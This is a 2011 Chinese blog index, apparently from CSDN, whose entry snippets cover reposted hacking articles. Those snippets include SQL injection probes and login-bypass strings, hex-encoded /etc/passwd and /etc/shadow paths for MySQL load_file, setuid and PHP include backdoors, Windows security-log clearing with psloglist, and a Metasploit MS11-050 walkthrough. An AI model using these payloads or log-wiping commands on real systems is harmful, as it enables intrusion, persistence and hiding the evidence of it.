- 博客(33)
- 资源 (5)
- 收藏
- 关注
RSS订阅转载 关于彩虹表的那点事
题目:关于彩虹表的那点事作者:hackest [H.S.T.]来源:hackest's blog一、概述什么是彩虹表?彩虹表(Rainbow Tables)就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合,不一定是针对MD5算法的,各种算法的都有,有了它可以快速的破解各类密码。越是复杂的密码,需要的彩虹表就越大,现在主流的彩虹表都是100G以上。嗯,最近似
2011-11-30 23:16:34
1920
转载 access注入思路
1.判断注入点 '单引号 异常 and 1=1 正常 and 1=2 异常2.判断数据库类型 and (select count (*) from msysobjects)>0 access异常 and (select count (*) from sysobjects)>0 mssql正常 ACCES
2011-11-30 20:56:38
1300
转载 Access偏移注入检测北大分站
Access偏移注入检测北大分站2011-10-01 22:25Access偏移注入检测北大分站作者:莫良来自BHST.org0x00大清早朋友丢来一站要我看,反正蛋疼厉害,就帮帮他呗。一看,哇靠北大分站,上跳板,我们来给他安全检测一番.具体没什么技术含量,高手飘过。0x01简单在首页试了几个可能存在注入的链接都失
2011-11-30 18:26:15
1456
转载 用Gpu破解md5、sha1等加密密码的软件
用Gpu破解md5、sha1等加密密码的软件IGHASHGPU v0.80官网 http://golubev.com描述该软件可使用ATI的RV 7X0/8X0 系列和nVidia“CUDA”的显卡来暴力破解MD4、MD5及SHA1等哈希值加密的密码,即本地解密md5,区别于在线解密如:http://www.cmd5.com/ 等。速度依赖于GPU,
2011-11-29 00:07:24
4160
转载 linux下留本地后门的两个方法
方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47
2011-11-27 21:35:40
856
转载 隐蔽后门
nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都丢了,于是想寻找一个超级隐蔽的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上 去搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞,比如用变量作为包含对像,这只是针对程序,而非针对php下include()这个函数.关于说这 个函数把任意文件解析为php的文
2011-11-27 21:18:22
804
转载 Nessus 使用说明
Nessus 使用说明 1. 硬件需求一台 linux 机器作为服务器端,一台 Windows 机器作为客户端。如果 linux 使用比较熟,也可以不使用 windows 作为客户端,直接使用 linux 下的客户端。(此文档暂不对这部分进行说明)2. NESSUS 的安装UNIX 系统服务器端需要编译然后才可以使用,推荐使用 linux 作为服务器。如技术条件允许
2011-11-27 20:41:11
4059
1
转载 NC提交数据的方法
今天才知道用NC还可以向web服务器提交修改后的数据包。1、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gatew
2011-11-25 15:40:27
2186
转载 在线hash密码破解网站列表
这是一份在线hash密码破解网站列表,支持多种类型的hash密码,目前可破解查询的hash包括:MD5、NTLM、LM、SHA1、SHA 256-512、MySQL、WPA-PSK 。MD5MD5Decrypter(uk)Plain-TextCrackfoo -NNCHashcrackGdataMD5thisMD5crackNoisetteJooml
2011-11-23 23:49:46
7901
转载 oracle里的replace和decode函数
replace函数 replace(字符串,'A','B');DECODE函数是ORACLE PL/SQL的功能强大的函数之一,目前还只有ORACLE公司的SQL提供了此函数,其它数据库厂商的SQL实现还没有此功能。DECODE有什么用途呢? 先构造一个例子,假设我们想给智星职员加工资,其标准是:工资在8000元以下的加20%;工资在8000元或以上的加15%,通常的做法是
2011-11-23 18:45:10
2444
转载 linux 命令
拿到一个linux下的shell之后,有用的命令整理:cat ./../mainfile.php - Config file.ls -la - Lists directory's.ifconfig {eth0 etc} - Ipconfig equiv.ps aux - Show running proccess's.gcc in_file -o out_f
2011-11-22 18:02:22
614
转载 对Windows下日志清除的一些总结
这几日研究的课题是系统日志的清理,主要参考的书籍是《暗战强人. 黑客攻防实战高级演练》,虽然讲到的技术比较老,但对于刚入门的我还是收获较大。在Windows系统中,日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等,其扩展名为.log、.txt。我们先来熟悉下各个日志文件存放的位置及相应的服务。系统
2011-11-22 11:54:41
3974
转载 windwos PS tools 管理员工具集 可以用来删日志哦
以下是我的工具列表: psfile.exe psgetsid.exe Psinfo.exe pskill.exe pslist.exe psloglist.exe pspasswd.exe psservice.exe psshutdown.exe whois.exe (注:1.上述工具
2011-11-22 11:34:42
1675
转载 windows日志删除工具
这个利器当然就是传说中的psloglist.exe工具了,在cmd下输入psloglist.exe \acceptelua可以防止弹出什么什么协议之类的psloglist.exe -c security 删除登录日志psloglist.exe -g security backup.evt 导出登录日志psloglist.exe -c -g security backup.evt 导
2011-11-22 11:27:19
2211
转载 从后台得到webshell技巧大汇总
前 言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshe
2011-11-22 01:23:05
2053
转载 各位大牛经典入侵经验摘录.
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!文章:各位大牛经典入侵经验摘录.2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据
2011-11-22 01:15:57
1949
转载 php+mysql快速渗透
1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL?简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
2011-11-21 18:20:06
1469
转载 Metasploit使用简介3
conect 命令connect命令可以连接到远程主机,连接方式和nc、telnet相同,可以指定端口,如下为connect命令演示:msf > connect 127.0.0.1 4000[*] Connected to 127.0.0.1:4000Microsoft Windows [Version 6.1.7600]Copyright
2011-11-21 17:20:42
1623
转载 Metasploit 使用简介2
Metasploit Framework 是非常优秀的开源渗透测试框架,像我这样的菜鸟刚刚听说,于是花时间好好研究了一下,整理了一下学习笔记,贴出来和大家一起交流。第一次写文章又不足的地方大家多多指点。Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的
2011-11-21 17:17:59
1315
转载 Metasploit使用简介(1)
show命令在msfconsole中键入show,系统会显示Metasploit的所有模块,若想显示某一类型的模块可以加入模块名称,最常用的主要有一下三个:show payloads、show exploits、show auxiliary。msf>show auxiliary Auxiliary=========
2011-11-21 17:16:52
2146
2
转载 google hacking....
link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面.不用担心==================================================intext:管理filetype:mdbinurl:filesite:xx.com filetype:txt 查找TXT
2011-11-21 12:40:48
3973
转载 LINUX下MYSQL的load_file常用路径
/etc/passwd 0x2F6574632F706173737764 /etc/shadow 0x2F6574632F736861646F77 /etc/issue 0x2F6574632F6973737565 /etc/fstab 0x2F6574632F6673746162 /etc/host.conf 0x2F6574632F686F73742E636F6E66 /etc/motd
2011-11-20 22:49:37
1216
转载 nmap中--script功能的使用
在新的nmap版本中,添加了script功能的使用。在nmap的安装目录的share/nmap/scripts中,已经有将61个写好的脚本提供。具体的用法可以参考:http://nmap.org/book/nse-usage.html 在这儿举几个具体的例子:nmap --script=smb-enum-users 192.168.199.9对19
2011-11-17 21:00:42
10733
转载 hacktips-10 条 nmap 的技巧
这里是 10 条 nmap 的技巧,运行于 CLI 环境下,如果你更喜欢用 GUI 工具的话,请用 Zenmap 。1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV
2011-11-17 20:38:18
612
转载 MS11-050 Metasploit 利用
首先打开Metasploit选择msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement然后配置选项 本机IP是 192.168.92.133进行攻击 exploit 在被攻击电脑上执行http://192.168.92.133:8888/lenhook.html返回Met
2011-11-17 19:44:12
1894
转载 汇编语言1—6章笔记
前言: 由于近期太忙!所以想到做这个,一面强迫自己学习,一面希望能给大家一点帮助!我以后会把汇编语言的各章重点以及详细的课后解答写出来,供大家学习参考!由于本人水平有限,制作仓促,不能保证解析完全正确。望批评指正!
2011-11-16 16:09:29
2104
原创 解决ubuntu安装软件的问题。
这里是正解http://www.cyberciti.biz/tips/troublesh ... ovals.html最主要是要用sudo执行以下命令apt-get --purge remove 软件包名新手一般不知道自己软件包的名字是什么,按帖子里的目录进去,grpe关键字就知道是什么了。关键字在出错信息里找。
2011-11-13 22:01:02
533
转载 Linux目录解释(蛮全)
/bin:bin是binary(二进制)的缩写。这个目录是对UNIX系统习惯的沿袭,存放着使用者最经常使用的命令。例如:cp,ls,cat。 /boot:这里存放的是启动LINUX时使用的一些核心文件。 /dev:dev是device(设备)的缩写。这个目录下是所有LINUX的外部设备,其功能类似DOS下的.sys和Win下的.vxd。在LINUX中设备和文件是用同种方法访问的
2011-11-10 18:06:19
535
转载 linux 死机了怎么办
Linux 会死机么?我可以很肯定地说,会!要让 Linux 死机很容易,但难的是在死机以后如何安全的让他摆脱死机状态,本文讲述如何从 linux 的死机状态中挣脱出来。Linux 死机有很多种情况,最常见的是系统负载过高导致的。如上次介绍的 fork 炸弹就是这个原理,此外还可以运行内存耗用极大的程序(如虚拟机),也会迅速提升系统负载。由于系统负载过高导致的卡死,一定是解决的越快越好!此
2011-11-10 12:47:14
754
转载 Linux的VM虚拟机扩展磁盘空间
(1)增加磁盘的操作类似于windows的vm的操作1),2),3)。(2)增加后进入系统看不到新增的磁盘,需要进行下面的步骤(3)。(3)启动VM环境下的linux操作系统,添加新分区,需要root账号身份。 3.1 【fdisk -l】 最大分区为/dev/sda3,说明新创建的分区将会是sda4 3.2 输入【fdisk /dev/sd
2011-11-06 02:35:48
951
转载 绕过SQL注入限制的方法
经过我的收集,大部分的防注入程序都过滤了以下关键字:and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。对于关键字的过滤,以下是我收集的
2011-11-01 05:24:54
754
转载 网站万能密码
好久都没写东西了,今天写个万能密码,说是万能,是因为如果网站没做防注入,用这个密码当帐户密码即可登录管理后台,进去后想干什么那就干什么了。附一些网上查到的万能密码'or''='"or=or"'or''=''or''=''or'='or''or'='1''or' '1'='1'or 'a'='a'经本人验证,'or''=''or''='的效果是最好的!
2011-11-01 00:50:53
1576
windows管理工具
2011-11-22
网站挂马扫描器(MScaner)
2011-11-22
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人